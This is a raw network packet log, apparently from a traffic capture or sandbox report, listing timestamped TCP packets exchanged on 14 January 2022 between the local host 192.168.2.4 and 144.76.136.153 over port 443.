Jan 14, 2022 00:16:04.184834003 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.184865952 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.184964895 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185014009 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185060024 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.185070038 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185089111 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.185111046 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.185134888 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185170889 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185209036 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.185214043 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185242891 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.185261011 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.185286999 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185321093 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185357094 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.185363054 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185388088 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.185404062 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.185492992 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185547113 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185584068 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.185590029 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185616970 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.185623884 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185636997 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.185648918 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185676098 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185688972 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.185694933 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.185738087 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.185750961 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.196963072 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.197002888 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.197082043 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.197096109 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.197134972 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.197168112 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.197412968 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.197449923 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.197494030 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.197504044 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.197520971 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.197639942 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.197824955 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.197887897 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.197900057 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.197909117 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.197951078 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.198353052 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.198386908 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.198421001 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.198427916 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.198451996 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.198934078 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.198970079 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.199002981 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.199008942 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.199039936 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.199299097 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.199336052 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.199358940 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.199364901 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.199403048 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.199424028 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.199784994 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.199820042 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.199862957 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.199873924 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.199898005 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.200244904 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.200280905 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.200387955 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.200398922 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.200406075 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.200705051 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.200738907 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.200782061 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.200788975 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.200809002 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.201265097 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.201298952 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.201337099 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.201343060 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.201366901 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.218648911 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.234824896 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.234875917 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.234951019 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.234966993 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.235022068 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.235042095 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.235079050 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.235110998 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.235116959 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.235143900 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.235167980 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.235203028 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.235234022 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.235240936 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.235272884 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.255116940 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.255153894 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.255203009 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.255219936 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.255253077 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.255867004 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.255903959 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.255956888 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.255965948 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.255980968 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.256426096 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.256460905 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.256527901 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.256536007 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.256582022 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.256616116 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.256648064 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.256654024 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.256685972 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.256758928 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.256792068 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.256820917 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.256859064 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.256869078 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.257014990 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257049084 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257077932 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.257085085 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257112026 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.257167101 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257200003 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257229090 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.257236004 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257266045 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.257327080 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257359982 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257392883 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.257404089 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257430077 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.257494926 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257530928 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257558107 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.257564068 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257596016 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.257674932 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257710934 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257735968 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.257741928 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257762909 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.257781982 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.257837057 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257910013 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.257922888 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.257989883 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.258044958 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.258080959 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.258116007 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.258121967 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.258137941 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.258202076 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.258245945 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.258274078 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.258280993 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.258306980 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.258368015 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.258402109 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.258476973 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.258533955 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.258547068 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.258573055 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.258606911 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.258759022 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.259886980 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.260395050 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.260432959 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.260473967 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.260485888 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.260514975 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.260550976 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.260790110 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.260826111 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.260865927 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.260873079 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.260900021 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.260921001 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.261298895 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.261334896 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.261369944 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.261374950 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.261399984 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.261416912 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.261537075 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.261573076 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.261606932 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.261612892 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.261647940 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.261663914 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.261945009 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.261980057 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.262021065 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.262031078 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.262064934 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.262085915 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.262350082 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.262387991 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.262419939 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.262423992 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.262451887 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.262466908 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.262727022 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.262764931 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.262888908 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.262898922 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.263062954 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.263097048 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.263132095 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.263138056 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.263164043 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.263191938 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.276757956 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.281107903 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.281148911 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.281208038 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.281223059 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.281249046 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.281265020 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.282179117 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.282217026 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.282264948 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.282277107 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.282305956 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.282324076 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.282705069 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.282742023 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.282782078 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.282788992 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.282812119 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.282833099 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.288713932 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.288752079 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.288820982 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.288835049 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.288872004 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.288897991 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.289046049 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.289119005 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.289159060 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.289165974 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.289192915 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.289211988 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.289444923 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.289483070 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.289519072 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.289526939 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.289551973 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.289570093 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.289818048 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.289890051 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.289895058 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.289913893 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.289966106 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.290226936 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.290262938 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.290318966 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.290328026 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.290335894 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.290627003 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.290663004 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.290698051 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.290708065 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.290726900 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.290754080 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.290956020 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.290992975 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.291033030 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.291040897 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.291049957 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.291084051 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.291366100 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.291404009 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.291457891 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.291469097 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.291491032 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.293693066 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.293879986 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.306068897 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.306108952 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.306164026 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.306179047 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.306214094 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.306230068 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.306911945 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.306951046 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.307008028 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.307018995 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.307049990 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.307069063 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.307720900 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.307759047 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.307797909 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.307805061 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.307846069 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.307863951 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.308128119 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.308165073 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.308202028 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.308208942 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.308238029 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.308255911 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.316679955 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.316732883 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.316853046 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.316867113 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.316874981 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.317009926 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.317045927 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.317076921 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.317085981 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.317111015 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.317141056 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.317394018 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.317430019 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.317465067 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.317472935 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.317487001 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.317511082 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.317764044 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.317799091 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.317832947 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.317842960 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.317864895 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.317883015 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.318205118 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.318252087 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.318296909 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.318305016 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.318382025 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.318406105 CET	49896	443	192.168.2.4	144.76.136.153
